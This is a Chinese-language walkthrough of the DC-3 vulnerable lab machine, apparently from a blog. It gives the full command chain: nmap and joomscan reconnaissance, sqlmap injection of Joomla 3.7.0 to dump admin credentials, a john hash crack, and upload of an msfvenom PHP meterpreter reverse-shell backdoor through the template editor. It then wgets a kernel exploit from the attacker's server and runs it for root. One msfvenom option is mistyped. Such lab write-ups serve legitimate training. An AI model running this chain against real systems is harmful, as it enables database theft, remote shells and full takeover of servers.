DC3详解

DC-3靶机

1.确定靶机IP

arp-scan -l

masscan --rate=10000 -p 1-65535 192.168.220.133

nmap -p80 -sV -A -T4 192.168.220.133

DC3详解

2.收集信息

根据nmap的扫描结果可以发现其CMS为joomla,采用joomla扫描器joomscan进行扫描

joomscan -u http://192.168.220.133

发现登录页面http://192.168.220.133/administrator/

发现joomla版本为3.7.0

查找相关漏洞

DC3详解

 searchsploit joomla 3.7.0

查找joomla 3.7.0存在的漏洞

DC3详解

 查看漏洞利用文章

searchsploit -p 42033.txt

DC3详解

 将txt文件复制到dc3目录(当前目录)下

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt ./

DC3详解

3.sqlmap利用

提示用sqlmap进行遍历数据库

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

将其中的localhost改为靶机的IP 192.168.220.133

sqlmap -u "http://192.168.220.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

DC3详解

 读取到五个数据库,注意到有一个joomla的数据库

采用sqlmap来遍历数据库joomladb中的表名,发现#__users表,遍历其中的内容

sqlmap -u "http://192.168.220.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

DC3详解

 sqlmap -u "http://192.168.220.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns

发现username和password两个列名

DC3详解

 查看其中的内容

sqlmap -u "http://192.168.220.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C "username,password" --dump

发现admin账户和其密码的hash值

DC3详解

 创建一个txt文件,将admin密码的hash值放入其中

touch 1.txt

vi 1.txt

采用john来解密hash值,得到密码为snoopy

DC3详解

登录admin账户密码snoopy

DC3详解 在模板中发现能够上传文件,尝试上传木马文件连接靶机

DC3详解

 4.文件上传

创建一个php木马上传

msfvenom -p php/meterpreter/reverse_tcp lhost-192.168.220.133 lport=4444 -f raw -o hack.php

生成一个php后门文件,将生成的后门文件放入网页templates(模板)中创建一个php文件

DC3详解

 

DC3详解

 DC3详解

 后门创建好后,打开msf进行木马利用

DC3详解

 use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 192.168.220.133

DC3详解

 exploit  //利用

DC3详解

 网站访问木马文件

192.168.220.133/templates/beez3/hack.php

DC3详解

 返回kali查看,此时已经获取到权限

DC3详解

 建立一个交互式shell

先输入shell

再输入python语法,建立交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

DC3详解

 searchsploit Ubuntu

searchsploit -p 39772.txt

然后建立网站目录

python -m SimpleHTTPServer 8888

PS:查看自身端口开放情况

wget http://192.168.220.129:8888/39772.zip

DC3详解

 unzip 39772.zip

DC3详解

 tar xf exploit.tar

进入39772文件夹下,然后打开exploit.tar文件

cd ebpf_mapfd_doubleput_exploit

进入ebpf_mapfd_doubleput_exploit目录下

./compile.sh

执行程序

DC3详解

 ./doubleput

执行程序doubleput

得到root权限,查看家目录,拿到最终的flag。

DC3详解

谢谢观看 !

 

上一篇:InfluxDb时序数据库基本概念学习


下一篇:浅谈微信三级分销系统的漏洞